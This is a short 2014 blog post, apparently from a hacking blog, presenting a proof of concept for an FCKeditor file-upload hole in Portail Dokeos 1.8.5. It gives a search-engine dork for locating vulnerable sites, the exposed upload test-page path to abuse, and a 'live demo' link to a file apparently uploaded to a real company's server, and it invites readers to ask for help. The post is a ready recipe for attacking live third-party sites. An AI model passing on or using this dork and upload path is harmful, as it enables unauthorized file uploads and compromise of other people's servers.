Sunday, 19 January 2014

Portail Dokeos : FCKeditor File Upload Vulnerability




POC

Dork:     inurl:"Portail Dokeos 1.8.5″

Exploit : /main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Live Demo: http://www.dmsautomotive.fr/dok/main/upload/alex.html

This is just like my previous post. I'm not going to explain anymore. :P 

If you still can't do this, leave a comment below :)